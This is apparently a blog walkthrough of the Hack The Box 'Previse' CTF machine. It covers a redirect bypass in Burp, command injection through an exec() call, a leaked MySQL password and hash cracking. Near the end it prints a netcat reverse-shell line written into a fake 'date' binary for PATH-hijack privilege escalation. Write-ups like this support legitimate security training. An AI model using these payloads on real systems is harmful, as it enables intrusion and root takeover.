Hack The Box Previse HTB CTF Machine Walkthrough


Previse HTB walkthrough

In this blog, we will cover the Previse HTB CTF challenge that is an easy machine. It is to Capture the flag types of CTF challenges. You will get to know a lot of learning in this CTF challenge. For example, Path Variable, Code Execution, Hashes Decrypting, etc.


Table of Content

Scanning

  • Port Scanning (Nmap Tool)

Enumeration

  • Directory Scanning through Gobuster

Exploitation

  • Code Execution through PHP
  • Decrypt MD5 Hash using Hashcat
  • Read (User.txt )

Privilege Escalation

  • Sudo Right with PATH Variable
  • Read (root.txt)



Scanning

As you know, we always do the first scan of the target network. Nmap may be the best tool for network scanning. To get more information regarding the Nmap command, Follow the below link.

nmap -sC -sV -oA nmap/previse 10.10.11.104

I found port 22 for SSH, Port 80 for HTTP are opened.

Nmap Scanning

Previse website Index page looks like this.

Previse Login Page

Enumeration

In most of the challenging stages, we need directory scanning. The Kali Linux carries several directory scanning tools for the penetration tester. Gobuster is a popular directory scanning tool, and we will use this tool for directory scanning. Let’s follow the below command.

gobuster dir --url http://10.10.11.104/ -w /usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-medium.txt -x php -o directory.log
Previse Gobuster Result

We found /nav.php file on scan with gobuster tool, which doesn’t redirect to other pages. Let us open this file.

Open nav.php File


But as soon as we tried to open /account.php page, we got redirected to login.php. We intercepted requests from /account.php using BurpSuite. Follow the below image.

Intercept Browser Request

Let’s change the status code 302 to 200. “200 OK”

Server Response Code


Excellent, we have found the page to create an account.

Account Page

Let’s create an account.

Create Account Pentestblog Name


Account creation was successful.

Username Success!

Let’s login with the latest credential.

Login Pentestblog UserName

We got a SITEBACKUP.zip file. Let’s download it.

Download SiteBackup.zip FIle

We found two files quite interesting after unzipping.

config.php, logs.php

Unzip Zip File

Surprise, I have obtained the username and password of the database. note it.

  • user = “root”
  • password = “mySQL_p@ssw0rd!:)”
Open Confilg.php


Returning to the page source code reviews searching for possible flaws was found the exec() function and it was possible to abuse it for code execution.

Open Logs.php FIle

Exploitation

Let’s use Burp to intercept the request from /logs.php page and test the code execution… Successful!

Conform Code Execution

Finally, we are ready for the reverse shell. Successful!

Reverse Shell

Finally, We are inside! Let’s log in to MySQL using the above credentials. If you have no idea. How Can I See List all Users In A MySQL Database Server? I think you should read the following blog.


Check Mysql Running

We have got a username and password, but the password is in an encrypted format.

MYSQL Password Found

We used hashcat to decrypt the hash with rockyou.txt wordlist.

hashcat -a 0 -m 500 user /usr/share/wordlists/rockyou.txt

Decrypt Mysql Password

We used ssh to connect as an m4lwhere user. Login Successful. We got our first flag.

“user.txt”

Read First Flag

Privilege Escalation

Now we need to escalate our privilege. Let’s type the command: sudo -l.

Sudo Right

Let’s Analyze the /opt/scripts/access_backup.sh script, you can see that some commands/binaries are called directly and there may be the vulnerability of “path injection”.

Watch CareFully


I configured the environment variable in /tmp directory and created the “date” file containing a netcat command to return a reverse shell on port 9001.

echo  "nc  10.10.14.4 9001 -e /bin/bash" > date
export PATH=/tmp:$PATH

Let’s execute the following command.

sudo /opt/scripts/access_backup.sh

We have received the reverse shell connection as root successfully!

Get Reverse Shell

We have got our second root flag!!!!!!!!. Subscribe to Pentestblog Youtube Channel…..

Root Flag


Rating: 5 out of 5.


Recent Posts



Most Popular Posts


Add a Comment

Your email address will not be published. Required fields are marked *